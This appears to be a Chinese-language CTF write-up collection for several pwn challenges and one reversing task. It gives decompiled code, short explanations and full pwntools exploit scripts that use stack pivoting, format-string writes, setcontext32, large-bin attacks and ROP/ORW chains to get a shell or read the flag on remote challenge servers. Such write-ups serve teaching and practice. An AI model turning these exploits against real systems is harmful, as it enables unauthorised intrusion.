int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[8]; // [rsp+8h] [rbp-8h] BYREF

  return (unsigned int)fgets(s, 256, _bss_start);
}

.text:0000000000401142 48 8B 15 E7 2E 00 00          mov     rdx, cs:__bss_start             ; stream
.text:0000000000401149 48 8D 45 F8                   lea     rax, [rbp+s]
.text:000000000040114D BE 00 01 00 00                mov     esi, 100h                       ; n
.text:0000000000401152 48 89 C7                      mov     rdi, rax                        ; s
.text:0000000000401155 E8 E6 FE FF FF                call    _fgets

首先需要栈迁移把栈迁移到已知 的地址上面的条件才能满足，第一次fgets 将rbp覆盖成 fgets_got + 0x8，然后调用 fgets，由于s的计算是通过rbp - 0x8，所以能直接将fgets_got覆盖，覆盖成printfile，然后再控制rbp，保证rbp - 0x8的值是flag最后调用fgets就好了

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 1
IP = "47.100.139.115"
PORT = 30708

elf = context.binary = ELF('./vuln')
libc = elf.libc
# libc = ELF('./libc.so.6')

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

print_file_func = 0x00000000040115D
fgets_func = 0x000000000401142
fgets_got = 0x404018

payload = b'a' * 0x8
payload += p64(fgets_got + 0x8) # rbp
payload += p64(fgets_func) # rbp - 0x8
sl(payload)


# int __cdecl main(int argc, const char **argv, const char **envp)
# {
#   char s[8]; // [rsp+8h] [rbp-8h] BYREF

#   return (unsigned int)fgets(s, 256, _bss_start);
# }

payload = p64(print_file_func) # 修改fgets的got为printf_file_func 来控制 rdi
payload += p64(0x404038) # rbp
payload += p64(fgets_func) # 0x404028
payload += b"./flag\x00"
# g(p)
sl(payload)

p.interactive()

onewrite

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char *s; // [rsp+0h] [rbp-10h] BYREF
  unsigned __int64 v6; // [rsp+8h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(_bss_start, 0LL);
  printf("%p\n> ", &printf);
  __isoc99_scanf("%p%*c", &s);
  fgets(s, 768, stdin);
  puts("bye");
  return v6 - __readfsqword(0x28u);
}

有一次任意地址写大量数据的原语，还有libc的地址，看官方wp发现有个叫setcontent32的项目，只需要一次任意地址写的原语和知道libc的基地址，就可以通过这个项目生成payload去getshell https://hackmd.io/@pepsipu/SyqPbk94a

exp

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 1
IP = "47.100.139.115"
PORT = 30708

elf = context.binary = ELF('./vuln')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])


def create_ucontext(
    src: int,
    rsp=0,
    rbx=0,
    rbp=0,
    r12=0,
    r13=0,
    r14=0,
    r15=0,
    rsi=0,
    rdi=0,
    rcx=0,
    r8=0,
    r9=0,
    rdx=0,
    rip=0xDEADBEEF,
) -> bytearray:
    b = bytearray(0x200)
    b[0xE0:0xE8] = p64(src)  # fldenv ptr
    b[0x1C0:0x1C8] = p64(0x1F80)  # ldmxcsr

    b[0xA0:0xA8] = p64(rsp)
    b[0x80:0x88] = p64(rbx)
    b[0x78:0x80] = p64(rbp)
    b[0x48:0x50] = p64(r12)
    b[0x50:0x58] = p64(r13)
    b[0x58:0x60] = p64(r14)
    b[0x60:0x68] = p64(r15)

    b[0xA8:0xB0] = p64(rip)  # ret ptr
    b[0x70:0x78] = p64(rsi)
    b[0x68:0x70] = p64(rdi)
    b[0x98:0xA0] = p64(rcx)
    b[0x28:0x30] = p64(r8)
    b[0x30:0x38] = p64(r9)
    b[0x88:0x90] = p64(rdx)

    return b


def setcontext32(libc: ELF, **kwargs) -> (int, bytes):
    got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")
    plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
    return got, flat(
        p64(0),
        p64(got + 0x218),
        p64(libc.symbols["setcontext"] + 32),
        p64(plt_trampoline) * 0x40,
        create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
    )
# e.g. dest, payload = setcontext32.setcontext32(
#         libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__()
#     )

p = connect()


libc.address = int(r(14),16) - libc.sym['printf']
dst, payload = setcontext32(libc, rip=libc.sym["system"], rdi=libc.search(b"/bin/sh").__next__())

sl(hex(dst))
sl(payload)


p.interactive()

fermat

题目附件https://github.com/nyyyddddn/ctf/tree/main/dasctf2024_summer_challenge

pwn

spring_board

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+Ch] [rbp-4h]

  myinit(argc, argv, envp);
  puts("Life is not boring, dreams are not out of reach.");
  puts("Sometimes you just need a springboard.");
  puts("Then you can see a wider world.");
  puts("There may be setbacks along the way.");
  puts("But keep your love of life alive.");
  puts("I believe that you will succeed.");
  puts("Good luck.");
  putchar(10);
  puts("Here's a simple pwn question, challenge yourself.");
  for ( i = 0; i <= 4; ++i )
  {
    puts("You have an 5 chances to get a flag");
    printf("This is the %d time\n", (unsigned int)(i + 1));
    puts("Please enter a keyword");
    read(0, bss, 0x40uLL);
    printf(bss);
  }
  return 0;
}

非栈上格式化字符串，需要找一个指向栈的双重指针去写地址，然后调整双重指针实现任意地址写，got表可以写，这个情况有点麻烦，除非一次写四个字节？远程试了几次发现能写成功？？ 也可以写main的返回地址为onegadget吧，这样就不用一次写这么多字节了

exp

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "node5.buuoj.cn"
PORT = 28552

elf = context.binary = ELF('./pwn')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()
# _libc_stack
payload = "-%9$p-%11$p"

# ru("Please enter a keyword")
s(payload)

ru('-')
libc_base = int(r(14),16) - (0x7ba6ad020840 - 0x7ba6ad000000)
ru('-')
stack = int(r(14),16)

success(hex(libc_base))
success(hex(stack))

target_i = stack - (0x7ffd3b5bd3a8 - 0x7ffd3b5bd2bc)
success(hex(target_i))

one_gadget = libc_base + 0xf1247
system = libc_base + libc.sym['system']
puts_got = 0x601020
printf_got = 0x0000000000601028

success(f"one_gadget ->{hex(one_gadget)}")


# pwndbg> fmtarg 0x7ffec2942308
# The index of format argument : 12 ("\%11$p")
# pwndbg> fmtarg 0x7ffec29423d8
# The index of format argument : 38 ("\%37$p")

payload = b"%" + str(printf_got & 0xffffff).encode() + b"c%11$lln\x00"
# g(p)
s(payload)

# g(p)
payload = b"%" + str(one_gadget & 0xffffffff).encode() + b"c%37$n\x00"
success(hex(system))

s(payload)


# g(p)
s(b'/bin/sh\x00')


p.interactive()

magicbook

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+Ch] [rbp-4h] BYREF

  init(argc, argv, envp);
  sandbox();
  menu1();
  dest = malloc(0x100uLL);
  while ( 1 )
  {
    book = (unsigned __int16)book;
    menu2();
    __isoc99_scanf("%d", &v3);
    if ( v3 == 4 )
      exit(0);
    if ( v3 > 4 )
    {
LABEL_12:
      puts("Invalid choice");
    }
    else
    {
      switch ( v3 )
      {
        case 3:
          edit_the_book();
          break;
        case 1:
          creat_the_book();
          break;
        case 2:
          delete_the_book();
          break;
        default:
          goto LABEL_12;
      }
    }
  }
}

void *edit_the_book()
{
  size_t v0; // rax
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  puts("come on,Write down your story!");
  read(0, buf, book);
  v0 = strlen(buf);
  return memcpy(dest, buf, v0);
}

size_t creat_the_book()
{
  size_t v0; // rbx
  __int64 size[2]; // [rsp+Ch] [rbp-14h] BYREF

  if ( book > 5 )
  {
    puts("full!!");
    exit(0);
  }
  printf("the book index is %d\n", book);
  puts("How many pages does your book need?");
  LODWORD(size[0]) = 0;
  __isoc99_scanf("%u", size);
  if ( LODWORD(size[0]) > 0x500 )
  {
    puts("wrong!!");
    exit(0);
  }
  v0 = book;
  p[v0] = malloc(LODWORD(size[0]));
  return ++book;
}

__int64 delete_the_book()
{
  unsigned int v1; // [rsp+0h] [rbp-10h] BYREF
  int v2; // [rsp+4h] [rbp-Ch] BYREF
  char buf[8]; // [rsp+8h] [rbp-8h] BYREF

  puts("which book would you want to delete?");
  __isoc99_scanf("%d", &v2);
  if ( v2 > 5 || !p[v2] )
  {
    puts("wrong!!");
    exit(0);
  }
  free((void *)p[v2]);
  puts("Do you want to say anything else before being deleted?(y/n)");
  read(0, buf, 4uLL);
  if ( d && (buf[0] == 89 || buf[0] == 121) )
  {
    puts("which page do you want to write?");
    __isoc99_scanf("%u", &v1);
    if ( v1 > 4 || !p[v2] )
    {
      puts("wrong!!");
      exit(0);
    }
    puts("content: ");
    read(0, (void *)(p[v1] + 8LL), 0x18uLL);
    --d;
    return 0LL;
  }
  else
  {
    if ( d )
      puts("ok!");
    else
      puts("no ways!!");
    return 0LL;
  }
}

约束非常多，程序没有canary，给了一个elf的地址，并且把execve给禁用了，通过large bin attack插入时利用构造一个任意地址写，往book那写一个很大的数字，这样edit read的时候就能溢出覆盖返回地址，然后就是正常的rop + orw了

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "48.218.22.35"
PORT = 10000

elf = context.binary = ELF('./pwn')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

def create(size):
    sla("Your choice:","1")
    sla("How many pages does your book need?",str(size))

def delete(idx,y = 0,idx1 = 0,content = b''):
    sla("Your choice:","2")
    sla("which book would you want to delete?",str(idx))
    if y:
        sla("Do you want to say anything else before being deleted?(y/n)","y")
        sla("which page do you want to write?",str(idx1))
        sa("content: ",content)
    else:
        sla("Do you want to say anything else before being deleted?(y/n)","n")

def edit(content):
    sla("Your choice:","3")
    sa("come on,Write down your story!",content)


ru("give you a gift: ")
d = int(r(14),16)
elf_base = d - 0x4010
success(hex(d))
success(hex(elf_base))

create(0x4d8)
create(0x38)
create(0x4b8)

delete(0)
create(0x500) # large bin

book = elf_base + 0x000000000004050
delete(2,1,0,p64(0) * 2 + p64(book - 0x20))
create(0x500) # large bin attack

rdi = elf_base + 0x0000000000001863
rsi = elf_base + 0x0000000000001861 # pop rsi r15 ret
bss = elf_base + 0x4110
edit_func = elf_base + 0x0000000000015E1

puts_got = elf_base + elf.got['puts']
puts_plt = elf_base + elf.plt['puts']

payload = b'a' * 0x28 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(edit_func)
edit(payload)
rl()
libc_base = u64(r(6).ljust(8,b'\x00')) - libc.sym['puts']
success(hex(libc_base))


rdx = libc_base + 0x000000000011f2e7 # pop rdx r12 ret
open = libc_base + libc.sym['open']
read = libc_base + libc.sym['read']
write = libc_base + libc.sym['write']


payload = b'a' * 0x28 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(edit_func)
time.sleep(0.3)
sl(payload)

payload = flat([
    b'a' * 0x28,
    rdi,0,rsi,bss,0,rdx,0x8,0,read,
    rdi,bss,rsi,0,0,open,
    rdi,3,rsi,bss,0,rdx,0x40,0,read,
    rdi,1,rsi,bss,0,rdx,0x40,0,write
])

time.sleep(1)
sl(payload)

success(hex(bss))
# g(p)
time.sleep(1)
s(b'./flag\x00\x00')


# g(p)

p.interactive()

re

DosSnake

16位的程序，发现有一个dasctf的字段，查找dasctf字段的引用发现这样一段逻辑，可以发现就是一个简单的异或加密，置反一下得到flag

encrypted_data = [
    0x3F, 0x09, 0x63, 0x34, 0x32, 0x13, 0x2A, 0x2F, 0x2A, 0x37,
    0x3C, 0x23, 0x00, 0x2E, 0x20, 0x10, 0x3A, 0x27, 0x2F, 0x24,
    0x3A, 0x30, 0x75, 0x67, 0x65, 0x3C, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00
]

key = [0x44, 0x41, 0x53, 0x43, 0x54, 0x46]
key_length = len(key)

decrypted_data = []

for i in range(len(encrypted_data)):
    decrypted_byte = encrypted_data[i] ^ key[i % key_length]
    decrypted_data.append(decrypted_byte)

for i in decrypted_data:
    print(chr(i),end="")
# {H0wfUnnytheDosSnakeis!!!}

题目附件https://github.com/nyyyddddn/ctf/tree/main/wkctf_pwn

pwn

baby_stack

在guess number逻辑这里用格式化字符串泄露 libc地址后

__int64 wait()
{
  unsigned int v0; // eax
  char s[5]; // [rsp+Bh] [rbp-85h] BYREF
  char format[120]; // [rsp+10h] [rbp-80h] BYREF

  puts("Press enter to continue");
  getc(stdin);
  printf("Pick a number: ");
  fgets(s, 5, stdin);
  v0 = strtol(s, 0LL, 10);
  snprintf(format, 0x64uLL, "Your magic number is: %%%d$llx\n", v0);
  printf(format);
  return introduce();
}

echo 这存在一个 off by null的溢出，有大量的leave ret的逻辑，走完这些leave ret 栈就被迁移到了buf上，由于不知道具体位置，找大量的 nop: ret的gadget写满buf，再结尾写一个system binsh的rop就好了，有可能会因为system中 xmm寄存器 rsp对齐的原因失败，多跑几次就好了

__int64 __fastcall echo(unsigned int a1)
{
  char v2[256]; // [rsp+0h] [rbp-100h] BYREF

  return echo_inner(v2, a1);
}


int __fastcall echo_inner(_BYTE *a1, int a2)
{
  a1[(int)fread(a1, 1uLL, a2, stdin)] = 0;
  puts("You said:");
  return printf("%s", a1);
}

exp

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "110.40.35.73"
PORT = 33632

elf = context.binary = ELF('./pwn')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

sla("Press enter to continue","")


sla("Pick a number:","6")

ru("Your magic number is: ")
libc_base = int(rl()[:-1],16) - 0x3ec7e3
success(hex(libc_base))

pop_rdi_ret = libc_base + 0x000000000002164f
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))
ret = libc_base + 0x000000000003f8e8
nop_ret = libc_base + 0x000000000001b5a8




sla("How many bytes do you want to read (max 256)?","256")


payload = p64(nop_ret) * 0x10 + p64(pop_rdi_ret) + p64(binsh) + p64(system) 
payload = payload.ljust(256,b'\x61')

# g(p)
s(payload)


# g(p)

p.interactive()

easy_heap

glibc 2.23

只有 add edit show三个逻辑，其中show逻辑只能打印八个字节的数据，edit中存在溢出，house of orange，打house of orange的时候，剩余的top chunk大小如果属于fastbin范围，比如说 0x61 就能得到一个fastbin，在sizelist往上部分，有一个位置的值是 0x71，刚刚好满足fastbin的大小，通过fastbin attack可以把堆块申请到那边，然后再配合edit的溢出就能写到chunklist，之后就能实现任意地址读写的原语，通过got泄露libc的基地址，然后将got改成onegadget getshell

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  init(argc, argv, envp);
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      v3 = 0;
      __isoc99_scanf("%d", &v3);
      if ( v3 != 3 )
        break;
      show();
    }
    if ( v3 <= 3 )
    {
      if ( v3 == 1 )
      {
        add();
      }
      else if ( v3 == 2 )
      {
        edit();
      }
    }
  }
}

unsigned __int64 show()
{
  unsigned int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  v1 = 0;
  puts("Index :");
  __isoc99_scanf("%d", &v1);
  write(1, *((const void **)&chunk_ptr + v1), 8uLL);
  return __readfsqword(0x28u) ^ v2;
}

unsigned __int64 add()
{
  unsigned int v0; // ebx
  int size[7]; // [rsp+4h] [rbp-1Ch] BYREF

  *(_QWORD *)&size[1] = __readfsqword(0x28u);
  size[0] = 0;
  if ( (unsigned int)chunk_number > 0x20 )
  {
    puts("too much");
    exit(0);
  }
  puts("Size :");
  __isoc99_scanf("%d", size);
  if ( size[0] > 0x1000u )
  {
    puts("too large");
    exit(0);
  }
  chunk_size[chunk_number] = size[0];
  v0 = chunk_number;
  *((_QWORD *)&chunk_ptr + v0) = malloc((unsigned int)size[0]);
  puts("Content :");
  read(0, *((void **)&chunk_ptr + (unsigned int)chunk_number), (unsigned int)size[0]);
  ++chunk_number;
  return __readfsqword(0x28u) ^ *(_QWORD *)&size[1];
}

unsigned __int64 edit()
{
  unsigned int v1; // [rsp+0h] [rbp-10h] BYREF
  _DWORD nbytes[3]; // [rsp+4h] [rbp-Ch] BYREF

  *(_QWORD *)&nbytes[1] = __readfsqword(0x28u);
  v1 = 0;
  nbytes[0] = 0;
  puts("Index :");
  __isoc99_scanf("%d", &v1);
  puts("Size :");
  __isoc99_scanf("%d", nbytes);
  if ( nbytes[0] > 0x1000u )
  {
    puts("too large");
    exit(0);
  }
  puts("Content :");
  read(0, *((void **)&chunk_ptr + v1), nbytes[0]);
  return __readfsqword(0x28u) ^ *(_QWORD *)&nbytes[1];
}